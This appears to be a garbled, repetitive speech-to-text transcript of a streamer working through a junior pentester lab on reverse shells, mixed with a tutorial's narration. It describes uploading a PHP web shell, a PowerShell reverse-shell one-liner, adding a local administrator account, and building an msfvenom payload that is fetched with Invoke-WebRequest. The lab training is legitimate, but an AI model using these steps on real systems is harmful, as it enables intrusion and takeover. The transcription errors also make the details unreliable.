You fucking with me. Oh. Ah. What the fuck you mean? I'm gonna blow my nose. Here, chew this. Oh, I'm sorry. I'm gonna blow my nose. There's no way this is a 45-minute lesson. I've been on it for like 3 hours. Oh, you motherfucker. Wrong goddamn mic, dude. Port 443. Is that the port that's open? Why would I use port 443? Do I need to upload that? Oh, damn it. Wrong one. This shit's driving me nuts, dog. Man, I'm not understanding. It's driving me fucking crazy. What's up? Pleasure is pain. Fuck. Because how am I supposed to... It's the same IP, ain't it? Is it not the same fucking IP? Well, that's Linux. Oh, that's fucking why. My dumb ass. Fuck. I'm like, it's the same IP as the Linux machine. I'm tripping. I'm tired, man. I just want to get this goddamn lesson done. Oh, shit. Okay. Switch to the Windows VM. Try uploading and activating the PHP routers. Oh. Tripping. Is that up yet? No. Fuck. PHP reverse show. That's gonna be a different one. Is it the same one? It is the same one. I'm still just using port 22222. Alright, let's go back. 179. Oh, that's not even the right fucking IP. I'm tripping. What fucking IP is that? Yeah, because it's not even a real IP. IP is gonna be that. There we go. Alright, what's it want me to do? Uploading, activating it to where? Let's nmap that real quick. Son of a bitch, hang on. Sure. What? 4443. That's already being used. I don't want to use 4. I'm gonna try using port 222. You motherfucker! Did I even click that? To attack. I fucked that up already. Hang on. Let's go back to the file. Turn out 64.5.79. Port. I'm gonna use port 2222. Oh my fucking back, dog. Do I have use port 443? No. Alright, user share web shells. Oh, I didn't fucking set netcat, you motherfucker. Where the fuck is my other fucking... Oh. Oh, we gotta change something. That's what I thought. Okay, let's change the command. Oops, fuck, I'm tripping. It said uname. Where's the command uname? It tells you somewhere in here what it is. It does not work. I feel like that's not gonna work just correctly. Let's get netcat back up. Where you at? What the fuck is this? Oh. Where's my other one? That's that long payload shit. Okay, let's go back. Woo, motherfucker. Turn up 64.172.174. Okay, let's get the netcat back up. Let's try that again. What the fuck am I doing wrong? Fuck, let's try a 443. What the fuck? Let's see. Motherfucker, it's not what I typed. Yeah, that is okay. Let's try that. Oops. It doesn't work, so. What am I fucking doing wrong? I need a video on this.
In this episode of the Junior Pentester Training Series, we are going to just go ahead of the PHP reverse shell and change the the file. So let's see, or not the file, the work. So undefined variable in this file on line 184 failed to daemonize. This is quite common and non-fatal. Oh, you know what? Because they said that all of these basic PHP shells are written for Linux machines. So it should not be literally like very, very basic script. Very, very basic shell script. So this is what it looks like. Okay, I think that should be it. I just want to make sure
that's what I did.
that I have done the typing of all of this correctly. I think I have. So this is basically it, like really basic script. Feel free to pause the screen if you want to just type this out for yourself. So PHP echo, and then the pre portion of it, it needs to be inside of quotes.
Yeah, I get that, dude. Get to the goddamn
shell
point.
exec get cmd, and it works. So they actually make this work. So I will go ahead and browse for it, and there's the Windows shell. We're going to open that one. We're going to submit it, and we're going to try to do this again. So the portion of this, I think, should actually be something along the lines of actually adding the CMD portion into our browser, right? So if it's inside of the Windows shell PHP, we need to do this. We need to do something like, you know, uploads / Windows shell.php, and then there's a query that we have to submit. To it, which is the $CMD equals. So for this, it would be ipconfig, for example, press enter, and it works. So there you go. There's the actual web shell.
Yeah, so it is working. Motherfucker.
That works for us in this particular case, and now we can really run any command after this to be able to make it work. So for example, I can do you know, dir, and it should give me the contents of this specific location that I'm at, which is the directory XAMPP HD docs, uploads, etc. And we have inside of it the PHP reverse shell and Windows shell files that we uploaded just now into it, right? So this is actually working, and we're getting the contents that we want. So the next thing that we want to try to do here is we want to try to ideally get some kind of a reverse listener on this, right? So the reverse shell needs to be done with that like super long freaking command that was URL encoded. I don't know if you remember that part.
Yeah, I remember that shit.
It wasn't URL encoded. It was just this like super long command that needs to get the URL encoded version so that we can type it into our browser and actually execute. So it would come after the CMD portion. And if you remember, so let's actually go up here just so I can kind of show you these things, because I think it was in web shells maybe, which was it might be this one right here, PowerShell C, etc., and then let's see if this is the one. Yeah, because it has the port number and it has.
That is the one. That's what I thought.
The IP number. I think this is the one, the version of this. There was another one that we saw earlier as well that was like this giant thing. So let's see if maybe it's inside the common shell payloads. There we go. This is the one. PowerShell C client, new object system, sockets, TCP client, and then the IP address, etc. So this, I believe this is the actual thing that has been URL encoded for us in that other element, in the web shells element. So it's this whole piece right here that's already been encoded for us, and it has the IP and the
Okay, Cyber Chef. Where was that at? Which IP do I use? Ten dot 64. 85.79.85.79. Still not really listening.
the port elements that I would need to change. So I'm going to copy this and I'm going to go and open up just a text editor inside my browser, and I need to modify that element by
Use Cyber
text
Chef.
file. We're going to paste it. So this is what we have here, and we need to modify the IP address and the port with the IP address and the port of our machine of our attack box.
So maybe I need to get rid of the. Yeah, let's get rid of that. Let's get rid of that. Let's get rid of that. Is it still not fucking working?
I want to say, because we're going from the web browser version of this, hopefully. So TCP client, and then because I'm comparing it to my second monitor, I just want to make sure that it's actually right. 1027, 10, 201, 256, 252, and then we have the 2C that will have the following port number. Okay, so yes, this is it. So this would be the proper version. E can control Z. We will do 1, 2, 3, 6, 250 elements by creating a new text file. We're going to paste it. So this is what we have here. And we need to modify the IP address and the port with the IP address and the port of our machine of our attack box, I want to say. Because we're going from the web browser and connecting to our attack box. So it's the 10, 201, 46, 252, and I'll do port, whatever, 2222, I guess. So what was it again? 10, 201.
Alright, let's do a different port. Let's change the port. That's why I did a bunch of twos. Fuck. How the fuck do I name cat? Oh. OMG.
46252, so that's going to be in IP right here. 10.201.46.252, right? Yep, okay, great. And then on the port, we will do 1, 2, 3. No, not 1, 2, 3, 4. I'll do 22, 22.
So the same thing I did.
I hope I didn't mess that up. So let me see if I can control Z with this. 22, 22. There we go. Okay, so
Let's just use that real quick. Son, bite you, motherfucker. Seven, 9. Finally, motherfucker. Yeah, I remember how to create the new net user Larry /add net local group administrators Larry /add. Fucking right. Okay. God, that was such a pain in that.
I want to say that this is the appropriate version of this.
It is.
Hopefully. So TCP client, and then because I'm comparing it to my second monitor, I just want to make sure that it's actually right. 1027.
This guy's too slow. Motherfucker. Yup, it worked. I made a reverse shell from the target. lost.
to see that will have the following important. Okay, even go back to the root folder here. We have all the contents inside the root folder. Amazing stuff that actually worked, and we were able to pull it off. So if you need to, this user and then hack him and the password. That's basically all I do. This dynamic resolution, clipboard, all of those things, that can also be something that's very, very handy to do. So I will just copy all of that, because I think it actually helps with the window that's being generated. Because once we do this, we're going to get a connection. We're going to get an actual window that's going to open up. So the 201.78.148 is going to be name and the password. This user, and then Hank Hackerson, and password will just be password. And I want to say that's it. Yeah. And then we're going to add. So there we go. Net user is added. So now we're going to do net local group administrators and Hank Hackerson. So net local group administrators Hank Hackerson, and add. And there we go. So now I actually have a.
I'm lost. You can't do that in Command Prompt. That's why I'm confused, because you can't do this on Windows. That's why like, does this fucking enable on Windows? No, that's what I thought. That's not even on. That's not even a Windows fucking command. I'm so fucking lost.
A new user that I've added.
We already did all that.
Privileges, so we can actually go over here, or maybe go into this other one that I have over here. And from here, I could do potential remote desktop or Win. I think X3RDP is one of the ones that they have over here for us, which is, yeah, X3RDP. Add an admin, add it to the admins group. Experiment using SoCat and Netcat to obtain reverse and bind shells on the Windows target. It's going to be very similar to what we did previously, so I'm going to skip this element. Create a 64-bit Windows interpreter shell using MSFNM and upload it to the Windows target. Activate the shell and catch it with multi-handler. Experiment with the features of the shell. Create both staged and stageless interpreter shares for either target. Upload manually. Activate them and catching the shell with. Okay, so these two can be done on the same thing. So I'm going to do a stageless, I want to say, 64-bit Windows interpreter shell with MSFNM. Look at that. Do you want to allow your PC to be discoverable? Yes, I do. And we'll keep this element right here. So there we go. Now we actually have our Windows connection up there. And multi-handler is open here, so we're going to leave the multi-handler. And this piece is also going to be, I'm just going to open up another one to create the MSFNM payload here. So Windows x64, right? Windows 64-bit, yeah. So MSF Venom. Let's zoom in on this just so you can see what's going on. So MSF Venom, we're going to create a payload of Windows I think it's actually supposed to be Windows like this. Windows x64 interpreter and then we will do reverse TCP like that. That's going to be the name of the payload. The format is going to be exe. The file output name is just going to be, I will do payload, and then the L host is going to equal the listening host, which is my
This is gonna be executable.
my attack box 10 146.252, and the L port is going to equal 77.7. And there you go. I'm going to create a payload for NSF Venom, and that's going to open up right there. There, in our window right here, which is our multi-handler, I need to go ahead and change it. So saved payload, so that's all good. Good. So I need to go ahead and change the options here for my payload, which is the Windows, actually it's literally the same thing, so Windows x64 interpreter reverse TCP, that's the one that I have right here. And then that's going to open up right there. In our
Damn, I'm tired of this shit. I just want to get this thing done, but I want to know. Fuck, why ain't it working?
window right here, which is our multi-handler, I need to go, we're going to serve it on that port. And we need to do that invoke web request to actually download the listener or download the payload. I want to say, where's the invoke web request? Because it should be, it's not here. Let me find it real quick. Alright, here it is. So this is inside of the netcat stabilization section, the netcat shell stabilization. So this is it. And you can also find this just by Googling it. So invoke web request, and then give it the location of what you're trying to download and where you're trying to save it. So essentially that's what we're doing here. So invoke web request URI, and then give the IP address of the machine, etc., etc. So it will be on this one for the Windows machine. So we have invoke web request, and then the URI is going to be -URI http / 10.2.146.252 on the port 8888. That's what it is, right? There we go. And then we're going to do the / for payload. That's what we're getting from that location. And / payload, and we're going to get an output file here, which is the out file. -out file is going to be, I guess I'll save it in the C Windows temp payload. So we'll do C Windows temp.
I exit out the motherfucker, didn't I? Motherfucker.
Like that. C Windows temp, yep. And then payload. And that should be it, I want to say.
You motherfucker.
So do that, and there we go. It got it, and it said it received it. So there we go. This actually worked as well. So if I actually go to that location now, which is the C Windows temp payload, C Windows temp, go over there and list it, I should have a payload that is available here for me. There we go, that's the payload. Okay, great. So far so good. So now we need to just run the payload to be able to establish our connection. That's kind of the big piece. That would be that staged payload, etc., etc. So what we need to do in this case is we need to run.
What the fuck?
Name and the password. That's basically all I do. This dynamic is going to be password, and once we press enter, it's going to open staged less, I want to say. We are going to create a payload of Windows. I think it's actually supposed to be Windows like this. Windows x64 interpreter, and then we will do reverse.
How the fuck did I get so long?
TCP like that. That's going to be the name of the payload. The format is going to be exe. The file output name is just going to be, I will do payload, and then the L host is going to equal the listening host, which is my attack box, 10.201.46.252, and the L port is going to equal 7777. And there you go. I'm going to create a payload for MSF Venom, and that's going to open up right there. In our window right here, which is our multi-handler, I need to go ahead and change it. So saved payload, so that's all good. So I need to go ahead and change the options here for my payload, which is the Windows, actually it's literally the same thing, so Windows x64 interpreter reverse TCP. That's the one that I have right here. So that should be all good. So what we need to do now is we need to do an invoke web request. to actually download the file. So Python 3 HTTP server, and we're going to serve it on port, we'll do 8888. We're going to serve it on that port. And we need to do that invoke web request to actually download.
No, I got so lost on this.
The listener, or download the payload. I want to say, where's the invoke web request? Because it should be, it's not here. Let me find it real quick. All right, here it is. So this is inside of the netcat stabilization section, the netcat shell stabilization. So this is it. And you can also find this just by Googling it. So invoke web request, and then give it the location of what you're trying to download. And
God damn it. God damn it, well, quit doing that. Okay, that's what I needed. What the fuck? Okay.
and where you're trying to save it, location, and / payload, and we're going to get an output file here, which is the out file. -out file is going to be, I guess I'll save it in the C Windows temp payload. So we'll do C Windows temp, like me to run our multi-handler, and let's make sure that it actually, hopefully, is running and it's going to do what it needs to do. And once the multi-handler, there we go, started, reverse TCP handler on that location.
Fucking
Oh, you know
fast.
what? It's on port 4444, so that's something that I need to stop immediately, because I'm not doing it on port 4444. When I created it on port 7777. So 201.46.252, that part's fine, but I need to change the port to 7777. So let's do set L port to 7777, and that's all good. Now I can do run, and let's see if it actually starts the TCP handler on this element right here. Start exploited but no complete. The address is already in use. or unavailable. Wonderful. So now we need to create a whole other one, and this is the part that's kind of like a pain in the behind. So let's see if I'll do set L ports to 6666, and I'll have a payload, so it'll be payload 1.
I do the same
And
thing.
we're just wait for that to finish, and we're going to turn our Python server on one more time. There we go, on port 8888. And then on this side, we're going to go ahead and do the invoke web request again. So let's do this one last time, and let's see if this actually ends up being the issue. So L port 66, everything else is fine. Everything else stays the same. I just need to make sure that it has an exe extension, I think, because it needs to be able to run as an exe extension on our target machine. So it will be payload1.exe and saved as payload1.exe. There it is. So now we're going to do the Python server one more time again, and serving on that port. So now we will go ahead and one more time go ahead and invoke the web request on this. This is a lot of repetition, as you can see, but this is kind of where things get into your bones, into your internal memory banks, as they say. Payload1.exe.
I'm over it.
And I'll file. Oh, see, I didn't do the URI. You see? Oh, and it's not. Oh my God. So now I gotta we have a interpreter session, which is available inside of our Windows.
God, that was a pain in the ass, man. I'm done with that. I'm gonna play some Battlefield. Jesus, man. I ain't gonna lie, that was a bit of a pain in the ass. Alright, guys. I'm gonna fucking play some Battlefield for a second.